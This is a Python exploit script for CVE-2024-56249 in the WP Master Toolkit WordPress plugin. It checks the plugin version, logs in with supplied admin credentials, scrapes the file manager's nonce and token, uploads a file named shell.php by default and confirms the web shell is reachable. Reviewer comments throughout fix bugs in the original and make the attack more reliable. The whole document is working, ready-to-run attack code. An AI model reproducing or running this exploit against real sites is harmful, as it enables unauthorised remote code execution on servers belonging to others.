import argparse
import os
import re
import sys
from urllib.parse import urlparse

import requests
from bs4 import BeautifulSoup
# Exploit script by Nxploit | Khaled Alenazi
# Suppress urllib3's warnings, in particular the InsecureRequestWarning that
# would otherwise be printed for every request made with verify=False below.
requests.packages.urllib3.disable_warnings()
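# Highest plugin release the rest of this script treats as affected (CVE-2024-56249).
_LAST_VULNERABLE_VERSION = (1, 13, 1)


def _version_tuple(version):
    """Turn a dotted version string such as "1.13.1" into a comparable tuple of ints.

    Empty components (from a stray dot) are ignored and trailing zero components
    are dropped, so "1.13.1.0" compares equal to "1.13.1". An empty tuple means
    no numeric component was present.
    """
    parts = [int(p) for p in version.split(".") if p]
    while parts and parts[-1] == 0:
        parts.pop()
    return tuple(parts)


def probe_vulnerability(target_url):
    """Report whether the WP Master Toolkit plugin at *target_url* is on a
    release at or below 1.13.1, read from the plugin's public README.txt.

    Args:
        target_url: Base URL of the WordPress install, without a trailing slash.

    Returns:
        True when README.txt is reachable (HTTP 200) and its ``Stable tag``
        parses to a version <= 1.13.1; False on every other outcome (other
        status code, no parseable version, newer version, request error).
    """
    readme_url = f"{target_url}/wp-content/plugins/wpmastertoolkit/README.txt"
    try:
        # Certificate verification is off here, as for the session used later.
        response = requests.get(readme_url, verify=False, timeout=10)
    except requests.RequestException as e:
        print(f"[❌] Error while probing vulnerability: {e}")
        return False

    if response.status_code != 200:
        print("[❌] README file not found. Cannot verify the vulnerability.")
        return False

    match = re.search(r'Stable tag:\s*([\d.]+)', response.text)
    if not match:
        print("[⚠️] Could not determine plugin version.")
        return False

    version = match.group(1)
    print(f"[🔍] Detected plugin version: {version}")
    detected = _version_tuple(version)
    if not detected:
        # e.g. the regex captured only dots; the original raised ValueError here.
        print("[⚠️] Could not determine plugin version.")
        return False

    # Compare component-wise. The original float(version.replace(".", "")) <= 1131
    # turned "1.14" into 114 and "2.0" into 20, so any release written with fewer
    # digits than "1.13.1" was misreported as affected.
    if detected <= _LAST_VULNERABLE_VERSION:
        print("[🔥] Target is VULNERABLE to CVE-2024-56249! Exploiting...")
        return True
    print("[❌] Target is NOT vulnerable. (Version is newer than 1.13.1).")
    return False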
def breach_wp_login(session, login_url, username, password, headers):
    """Submit the wp-login.php form through *session* and report the outcome.

    Success is judged only by the cookie jar: the call returns True when a
    cookie whose name contains ``wordpress_logged_in`` is present afterwards.
    The POST response body is not inspected.

    Args:
        session: requests-style session that keeps cookies between calls.
        login_url: Full URL of wp-login.php.
        username: Sent in the ``log`` form field.
        password: Sent in the ``pwd`` form field.
        headers: Extra HTTP headers for the POST.

    Returns:
        True on a ``wordpress_logged_in`` cookie, otherwise False (also when
        the request raises a RequestException).
    """
    print("[🔑] Attempting to log in...")
    form = {
        "log": username,
        "pwd": password,
        "rememberme": "forever",
        "wp-submit": "Log In",
    }
    try:
        session.post(login_url, data=form, headers=headers, timeout=10)
    except requests.RequestException as e:
        print(f"[❌] Error during authentication: {e}")
        return False

    has_login_cookie = any("wordpress_logged_in" in c.name for c in session.cookies)
    if not has_login_cookie:
        print("[❌] Authentication failed! Check credentials.")
        return False
    print("[✅] Authentication successful!")
    return True
def extract_exploit_tokens(session, exploit_url, headers):
    """Fetch the plugin's file-manager admin page and pull two values out of it.

    The page is expected to embed a ``WPMastertoolkit_FileManager`` JavaScript
    object whose ``nonce`` member is read with a regex, plus an input named
    ``token`` whose ``value`` attribute is read the same way. No HTML parser is
    involved, and the regexes use no DOTALL flag, so the object literal has to
    sit on a single line for the nonce to match.

    Args:
        session: Authenticated requests-style session.
        exploit_url: URL of the file-manager settings page.
        headers: Extra HTTP headers for the GET.

    Returns:
        ``(nonce, token)`` as strings when both were found, else ``(None, None)``
        (also when the request raises a RequestException).
    """
    print("[📡] Extracting security tokens...")
    try:
        page = session.get(exploit_url, headers=headers, timeout=10).text
    except requests.RequestException as e:
        print(f"[❌] Error extracting security tokens: {e}")
        return None, None

    nonce = re.search(r'WPMastertoolkit_FileManager\s*=\s*\{.*?"nonce":"([a-zA-Z0-9]+)".*?\}', page)
    token = re.search(r'name="token"\s*value="([a-zA-Z0-9]+)"', page)
    if nonce is None or token is None:
        print("[❌] Failed to retrieve nonce or token!")
        return None, None

    nonce_value, token_value = nonce.group(1), token.group(1)
    print(f"[✅] Extracted nonce: {nonce_value}")
    print(f"[✅] Extracted token: {token_value}")
    return nonce_value, token_value
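def deploy_payload(session, upload_url, file_path, file_name, nonce, token, headers):
    """POST a local file to the plugin's file-manager page as a multipart upload.

    *file_name* doubles as the local path that is opened for reading and as the
    filename placed in the multipart body.

    Args:
        session: Authenticated requests-style session.
        upload_url: File-manager page URL that receives the POST.
        file_path: Remote directory, sent as both ``p`` and ``fullpath``.
        file_name: Local file to read; also the remote filename.
        nonce: Value obtained from extract_exploit_tokens.
        token: Value obtained from extract_exploit_tokens.
        headers: Extra HTTP headers for the POST.

    Returns:
        True when the server answered HTTP 200, else False — also when the local
        file cannot be opened or the request raises. A 200 only means the request
        was accepted; whether the file exists remotely is checked separately.
    """
    print(f"[📤] Attempting to upload {file_name} to {file_path}...")
    form = {
        "p": file_path,
        "fullpath": file_path,
        "token": token,
        "nonce": nonce,
    }
    try:
        handle = open(file_name, "rb")
    except OSError as e:
        # The original let a missing local file escape as an uncaught traceback.
        print(f"[❌] Could not open local file {file_name}: {e}")
        return False
    # The original never closed the file object it handed to requests; the
    # context manager releases it once the request has been sent.
    with handle:
        files = {"file": (file_name, handle, "text/plain")}
        try:
            response = session.post(upload_url, headers=headers, files=files, data=form, timeout=10)
        except requests.RequestException as e:
            print(f"[❌] Error during payload upload: {e}")
            return False

    if response.status_code != 200:
        print(f"[❌] Upload failed! Server response: {response.text}")
        return False
    print("[✅] Upload request sent successfully.")
    return True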
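def check_file_uploaded(file_check_url):
    """Fetch *file_check_url* and report whether it answered HTTP 200.

    Args:
        file_check_url: Expected public URL of the uploaded file.

    Returns:
        True when the GET returned status 200 (the body is printed), otherwise
        False — also when the request raises a RequestException.
    """
    try:
        # NOTE(review): unlike every other request in this script this call keeps
        # certificate verification enabled; a self-signed HTTPS target therefore
        # surfaces here as a RequestException. The original had no timeout and
        # no exception handling, so a connection error became a traceback.
        response = requests.get(file_check_url, timeout=10)
    except requests.RequestException as e:
        print(f"[❌] Error while checking uploaded file: {e}")
        return False

    if response.status_code != 200:
        # The original printed "despite HTTP 200 response" for every non-200
        # status; report the actual code instead.
        print(f"[❌] Uploaded file not reachable (HTTP {response.status_code}).")
        return False

    print(f"[🔥] Shell uploaded successfully! URL: {file_check_url}")
    print("[ℹ️] File content:\n")
    print(response.text)
    return True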
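def main():
    """Command-line entry point: parse arguments, then run the four stages in order.

    Each stage's failure ends the run with exit status 1 (the original called
    the site builtin ``exit()``, which reports success to the calling shell and
    is absent under ``python -S``).
    """
    parser = argparse.ArgumentParser(description=" Master Toolkit Exploit CVE-2024-56249 #by Nxploit | Khaled Alenazi")
    parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., http://192.168.100.74:888/wordpress4/)")
    parser.add_argument("-un", "--username", required=True, help="WordPress admin username")
    parser.add_argument("-p", "--password", required=True, help="WordPress admin password")
    parser.add_argument("-fp", "--filepath", default="wp-content/uploads/2025/03", help="File upload path (default: wp-content/uploads/2025/03)")
    parser.add_argument("-fn", "--filename", default="shell.php", help="File name to upload (default: shell.php)")
    args = parser.parse_args()

    wordpress_url = args.url.strip().rstrip("/")
    # First path segment of the URL (e.g. "wordpress4" for .../wordpress4/),
    # falling back to "wordpress" when the site is served from the root; it is
    # prefixed to the remote path in the file-manager's ``p`` query parameter.
    # NOTE(review): with that fallback a root install is addressed as
    # "wordpress/<filepath>"; whether the plugin resolves that cannot be told here.
    site_path = urlparse(args.url).path.strip("/")
    wordpress_folder = site_path.split("/")[0] if site_path else "wordpress"

    if not probe_vulnerability(wordpress_url):
        sys.exit(1)

    session = requests.Session()
    session.verify = False  # same choice as the verify=False in probe_vulnerability
    headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"}
    login_url = f"{wordpress_url}/wp-login.php"
    # One URL serves both the token scrape (GET) and the upload (POST); the
    # original built the identical string twice as exploit_url / upload_url.
    file_manager_url = f"{wordpress_url}/wp-admin/admin.php?page=wp-mastertoolkit-settings-file-manager&p={wordpress_folder}/{args.filepath}"

    if not breach_wp_login(session, login_url, args.username.strip(), args.password.strip(), headers):
        sys.exit(1)
    nonce, token = extract_exploit_tokens(session, file_manager_url, headers)
    if not nonce or not token:
        sys.exit(1)

    file_path = args.filepath.strip()
    file_name = args.filename.strip()
    if deploy_payload(session, file_manager_url, file_path, file_name, nonce, token, headers):
        shell_url = f"{wordpress_url}/{file_path}/{file_name}"
        print(f"[🔥] Shell successfully uploaded! Access it here: {shell_url}")
        check_file_uploaded(shell_url)


if __name__ == "__main__":
    main()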